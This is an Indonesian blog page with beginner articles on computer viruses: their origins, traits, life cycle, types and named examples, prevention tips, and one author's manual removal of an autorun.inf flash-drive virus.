Kedua, virus seringkali bertingkah lebih jauh dari harapan si pembuat virus. Virus yang dibuat secara asal-asalan bisa menimbulkan masalah lain yang lebih besar. Meskipun itu tidak berbahaya pada sistem tertentu, tetapi bisa saja menimbulkan masalah pada sistem yang lain.Ketiga, virus dapat menyebar secara cepat, dan dalam hal ini si pembuat virus tidak bisa mengontrol penyebarannya lagi dan siapa saja bisa terinfeksi oleh virus tersebut.
Dalam beberapa kasus, membuat virus dianggap sebagai barang bukti bahwa suatu virus jenis baru bisa melakukan sesuatu terhadap suatu sistem. Ini biasanya dinamakan proof-of-concept virus. Biasanya virus ini tidak memiliki efek tertentu dan tidak disebarkan ke jaringan publik. Ada lagi penulis virus yang mengklaim aktivitasnya sebagai suatu riset. Biasanya virus-virus ini belum sempurna pembuatannya sehingga berbahaya jika dilepas ke publik.

Mencegah virus
Ada beberapa hal yang bisa dilakukan untuk mencegah virus, berikut ini akan disajikan hal-hal tersebut.
* Membuat orang paham terhadap risiko virus,
Katakan kepada semua orang bahwa mereka selalu dalam risiko ketika membuka e-mail, membuka attachment e-mail, download file dari suatu situs atau saling bertukar disket. Mereka harus mengerti bahwa bahaya virus ada dimana-mana dan berhati-hatilah.

* Install program anti-virus dan update-lah secara reguler,
Program anti-virus dapat mendeteksi dan terkadang mampu untuk membasmi virus. Jika program tersebut menawarkan on-access scanner, segera saja gunakan fasilitas tersebut.

* Selalu gunakan software patch untuk menutup lubang security,
Selalu monitor perkembangan patch untuk sistem operasi yang Anda gunakan. Jika ada yang baru segera di-download dan jalankan agar menutup lubang security yang ada pada komputer Anda. Ini akan membuat virus sedikit sulit untuk menyebar.

* Gunakan firewall,
Sebuah firewall mampu untuk mencegah akses ilegal ke sistem komputer atau jaringan Anda. Ini juga bisa mencegah penyebaran virus secara cepat ke dalam jaringan.

* Selalu backup secara reguler data Anda,
Selalu buatlah backup untuk semua data yang ada pada komputer Anda. Pilihlah data dan program yang Anda anggap penting dan lakukan backup secara reguler. Jika sewakti-waktu komputer Anda terinfeksi virus maka Anda masih bisa melakukan restore dengan data dan program yang bersih.

Terima kasih. Semoga bermanfaat.

Jumat, 02 April 2010

Mengenal Virus Komputer

PENGERTIAN VIRUS
Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan “worm”.

ASAL MULA VIRUS
1949, John von Neumann, menggungkapkan ” teori self altering automata ” yang merupakan hasil riset dari para ahli matematika.
1960, Lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh John von Neumann, dengan membuat suatu jenis permainan/game. Mereka membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan. Program yang mampu bertahan dan menghancurkan semua program lain, akan dianggap sebagai pemenangnya.

KRITERIA VIRUS
Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut :
1. Kemampuan untuk mendapatkan informasi.
2. Kemampuan untuk memeriksa suatu file.
3. Kemampuan untuk menggandakan diri dan menularkan diri.
4. Kemampuan melakukan manipulasi.
5. Kemampuan untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan.Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan:
A. Kemampuan untuk mendapatkan informasi Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc.

B. Kemampuan memeriksa suatu program Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi.

C. Kemampuan untuk menggandakan diri Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :File yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file berisi program virus itu sendiri menggunakan nama file yang asli.Program virus yang sudah dieksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file yang ada.

D. Kemampuan mengadakan manipulasi, Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya. Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal :
* Membuat gambar atau pesan pada monitor.
* Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC.
* Memanipulasi file yang ditulari.
* Merusak file.
* Mengacaukan kerja printer, dsb.

E. Kemampuan Menyembunyikan diri, Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.Langkah langkah yang biasa dilakukan adalah:
* Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.
* Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri.
* Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya.

Virus tidak mengubah keterangan/informasi waktu suatu file dll.

SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
Dormant phase ( Fase Istirahat/Tidur ), Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini.
Propagation phase ( Fase Penyebaran ), Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya).
Trigerring phase ( Fase Aktif ), Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase.
Execution phase ( Fase Eksekusi ), Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb.

JENIS – JENIS VIRUS

Jenis-jenis virus yang sering berkeliaran di masyarakat umum.
Virus Makro, Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini.Contoh virus:
- Varian W97M, misal W97M.Panther. Panjang 1234 bytes, akan menginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
- WM.Twno.A;TW. Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC
- Virus Boot Sector, Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:).Contoh virus :
* Varian virus wyx ex: wyx.C(B) menginfeksi boot record dan floopy, Panjang :520 bytes.
Karakteristik: memory resident dan terenkripsi.
* Varian V-sign : Menginfeksi: Master Boot Record, Panjang 520 bytes. Karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic).
* Stoned.june 4th/ bloody, Menginfeksi : Master Boot Record dan floopy, Panjang 520 bytes.
Karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan”Bloody!june setelah komputer melakukan booting sebanyak 128 kali.
- Stealth Virus, Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan “Interrupt interceptor”. Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya.Contoh virus :
* Yankee.XPEH.4928, Menginfeksi file *.COM dan *.EXE.Panjang 4298 bytes Karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu.
* WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy an motherboot record, Panjang 520 bytes Karakteristik: menetap di memori; ukuran dan virus tersembunyi.
* Vmem(s) Menginfeksi file file *.EXE, *.SYS, dan *.COM, Panjang fie 3275 bytes.Karakteristik: menetap di memori, ukuran tersembunyi, di enkripsi.
- Polymorphic Virus, Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain.Contoh virus:
* Necropolis A/B, Menginfeksi file *.EXE dan *.COM,Panjang file 1963 bytes
Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur.
* Nightfall, Menginfeksi file *.EXE, Panjang file 4554 bytes
Karakteristik: menetap di memori, ukuran dan virus tesembunyi, memiliki pemicu, terenkripsi dan dapat berubah-ubah struktur.
- Virus File/Program, Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.Multi Partition Virus, Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector.Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:
# Disket, media storage R/W.
# Jaringan ( LAN, WAN,dsb).
# WWW (internet).
# Software yang Freeware, Shareware atau bahkan Bajakan.
# Attachment pada email, transfering file.

PENANGULANGANNYA
Langkah-Langkah untuk Pencegahan Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
* Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi.
* Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan.
* Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming dsb.
* Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.Semampunya hindari membeli barang bajakan, gunakan software-software open source.
Langkah-Langkah Apabila telah Terinfeksi Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb. Jika anda terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel).
Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara:
* Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb.
* Scan dengan antivirus anda, jika anda terkena saat auto-protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru.
* Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut. Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya.
* Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda .

Terima kasih.
Semoga bermanfaat.
Mengusir Virus ‘autorun.inf’

Sudah lama saya menggunakan AVG-Free sebagai anti virus dan selalu update otomatis setiap hari ketika online. Suatu saat, saya dikagetnya dengan terdeteksinya virus di flashdisk saya oleh teman-teman yang menggunakan antivirus McAfee. Rupanya AVG tidak bisa mendeteksi kehadiran virus tersebut. Dalam flashdisk saya ditemukan virus dalam bentuk autorun.inf dalam root direktori flashdisk. Jangan khawatir, kata teman saya, virusnya sudah dihilangkan.

Segera setelah pulang, saya install McAfee. Menariknya, setiap saya memasukan flashdisk, virus itu terdeteksi dan langsung di-delete oleh McAfee. Tapi, selang beberapa detik, virus itu muncul lagi, di-delete lagi, muncul lagi dan seterusnya…………

Akhirnya, pekerjaan saya mulai terganggu dengan perang antara virus dan anti virus tersebut! Rupanya McAfee hanya bisa mendeteksi kehadiran file autorun.inf yang merupakan bagian dari virus dan mencoba menghapusnya. Tapi McAfee tak bisa menghilangkan induk virusnya yang sudah terlanjur masuk ke laptop saya. Wah, pening deh….!

Akhirnya saya browsing ke Internet, cari artikel yang berhubungan dengan virus tersebut. Dari sejumlah artikel saya mulai paham bahwa induk virusnya disembunyikan di dalam recycle bin dalam keadaan HIDE (disembunyikan). Bagaimana untuk menghilangkannya? Cobalah urutan langkah berikut:

1. Ubah tampilan direktori (dari Folder, Tools, Folder Options, View). Ubahlah “Show hidden file”, matikan “hide extension for known file types”, matikan “hide protected operating system file”
2. Coba masuk ke C:\RECYLER
3. Jika virus ada disana, anda akan menemukan direktori seperti ini “S-1-5-21-1482476501-1757981266-682003330-1003″. Virus ada didalam direktori tersebut. Coba hapus! (Shift Del). Kemungkinan besar anda tidak akan bisa menghapusnya, karena file virus sedang aktif.
4. Re-boot komputer anda, dan boot dengan SAVE MODE. Hapus direktori virus di dalam C:\RECYCLER
5. Jangan masukan dulu flashdisk yang kemungkinan bervirus
6. Install McAfee! Setelah ini, jika ada flashdisk yang bervirus jenis ini, akan dihapus dari flashdisk.